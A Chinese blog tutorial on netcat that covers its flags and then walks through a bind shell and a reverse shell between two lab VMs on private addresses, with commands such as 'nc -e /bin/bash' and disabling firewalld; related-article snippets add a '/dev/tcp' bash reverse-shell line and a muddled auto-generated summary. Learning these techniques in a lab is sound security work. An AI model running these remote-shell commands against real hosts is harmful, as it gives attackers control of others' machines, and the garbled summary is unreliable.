nc的基本操作和反弹shell

最新推荐文章于 2024-05-17 10:27:09 发布
最新推荐文章于 2024-05-17 10:27:09 发布
阅读量9.2k 收藏 32
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46789316/article/details/116562234
版权

一、nc简介

  1. nc 在网络工具中有“瑞士军刀”美誉 ,所做的就是在两台电脑之间建立链接,并返回两个数据流。
  2. 可运行在TCP或者UDP模式,添加参数 ----u 则调整为UDP,默认为TCP
  3. 即可用在windows系统也可在linux系统,也可作用于二者之间,只是对应的命令有些差异。

二、nc常用参数

-l 开启监听
-p 指定一个端口
-v 显示详细输出
-e 指定对应的应用程序
-n nc不要DNS反向查询IP的域名
-z 连接成功后立即关闭连接

三、建立C-S连接

1 环境:
    目的在于实现client输入的内容同样显示在server的终端上

client:CentOS7  192.168.43.186

server:kali   192.168.43.19

(两台主机之间可以互相ping通)
在server端kali虚拟机上开启监听4444端口:

nc -lvvp 4444

在这里插入图片描述

在client端虚拟机上执行如下命令后并随便键入命令(如下图所示):

nc -v  192.168.43.19 4444

在这里插入图片描述
在这里插入图片描述

四、正向反弹shell

环境:

目的在于实现kali的shell反弹到CentOS7的终端上,并可在CentOS7上执行命令操作kali

kali监听端口、选择对应的程序,CentOS7连接kali

CentOS7 192.168.43.186

kali 192.168.43.19

步骤:

在kali上执行:

nc -lvvp 4444 -e /bin/bash

在这里插入图片描述
在CentOS7上执行:

nc 192.168.43.19 4444

在这里插入图片描述
链接成功
在这里插入图片描述

五、反向反弹shell

环境:

目的在于CentOS开启监听端口,然后kali自己将shell反弹给CentOS7,而无需CentOS7去连接kali

CentOS7  192.168.43.186

kali   192.168.43.19

步骤:

CentOS7上开启监听5555端口,等待kali连接并反弹shell:

nc -lvp 5555

在这里插入图片描述
kali连接CentOS7并将shell反弹过去 :

nc -e /bin/bash 192.168.43.186 5555

在这里插入图片描述
连接时报错了 发现是centos7的防火墙没关
在这里插入图片描述

systemctl stop firewalld.service

链接成功

在这里插入图片描述
在这里插入图片描述

参考文章:https://www.cnblogs.com/Zh1z3ven/p/12976609.html

Sweetie_x
关注
  • 3
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux下NC反弹shell命令(推荐)
09-15
本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。 首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...
详解NC反弹shell的几种方法
01-08
假如ubuntu、CentOS为...正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell
一只特立独行的兔先森
10-23 2万+
假设在内网环境中发现主机,通过漏洞获取到该主机控制权限,想要进一步对内网环境进行后续利用,这里可以通过反弹shell的方式去进行穿透,本次实验以nc工具为例来演示不同系统的操作
反弹Shell方法论,Windows篇
大河之犬的博客
10-10 796
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
shell命令之nc所有用法+网络抓包
最新发布
qq_30531921的博客
05-17 531
nc用法+总结
【渗透测试笔记】之【内网渗透——传输层隧道(nc的使用:nc的正反向shell、bash(1)
2401_84969775的博客
05-13 377
(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)目录,ubuntu是。
反弹shell的方法和场景
weixin_45653478的博客
04-01 1251
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。
NC反弹shell的几种方法
qq_59350385的博客
05-12 9670
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash
nc--反弹shell
wzhua的博客
08-04 2260
nc--反弹shell,小实验
nc的使用+反弹shell
2301_80366980的博客
02-18 836
记录学习linux中nc的使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
浅谈反弹shell
weixin_53284312的博客
01-12 2325
反弹shell
反弹shell初识
无痕的博客
11-01 4011
反弹shell的指令与演示
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常...[ 隧道技术 ] 反弹shell(一)nc反弹shell [ 隧道技术 ] 反弹shell(二)bash反弹shell [ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python反弹shell
NC_SHELL反弹提权.rar
05-09
,NC_SHELL反弹提权.
Linux命令(4)之nc
z19861216的博客
04-26 1万+
nc命令的常规用法。
Linux命令之nc命令
热门推荐
Mr_Wanter
06-01 3万+
nc是netcat的简写,是一个功能强大的网络工具,有着网络界的瑞士军刀美誉。nc命令在linux系统中实际命令是ncat,nc是软连接到ncat。nc命令的主要作用如下:1、验证服务器端口是否通 如下验证172.16.7.78服务器的80端口通,81端口不通。 2、拷贝文件 首先在文件接收终端test2机器上激活nc监听 然后在文件发送终端test1机器上发送文件 在test2上检查文件是否已成功接收test1主机上启动nc监听,ctrl+C中断通信。test2上连接监听,ctrl+C中断通信。 端口扫
nc命令用法举例
yanyuan_smartisan的博客
12-01 2283
https://www.cnblogs.com/nmap/p/6148306.html nc命令用法举例 什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速 ...
【安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6068
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
内网渗透-常用反弹shell方法总结
lza20001103的博客
04-15 2083
内网渗透-常用反弹shell方法总结
NC 反弹shell
08-30
NC反弹shell是一种利用NetCat工具实现的一种技术,用于在目标机器和控制机器之间建立一个反向连接,并获得对目标机器的控制权。在反弹shell中,目标机器先执行NC命令,将shell连接到控制机器上的NC监听端口,从而使控制机器能够控制目标机器。 有几种方法可以实现NC反弹shell。其中一种是使用bash反弹,命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 请注意,这种方法需要在控制机器上执行。 另一种方法是使用NC命令进行反向连接,命令如下: ``` nc -e /bin/bash 192.168.0.4 7777 ``` 这种方法适用于在CentOS或Ubuntu上使用。 还有一种方法是使用php反弹shell,需要目标机器安装NC。命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 同样,这种方法需要在控制机器上执行。 总而言之,NC反弹shell是一种通过建立反向连接实现对目标机器的控制的技术。可以使用不同的方法来实现反弹shell,如bash反弹和php反弹。这些方法需要根据具体情况和系统进行选择和执行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [详解NC反弹shell的几种方法](https://download.csdn.net/download/weixin_38664159/14048091)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [NC反弹shell的几种方法](https://blog.csdn.net/qq_59350385/article/details/124733038)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值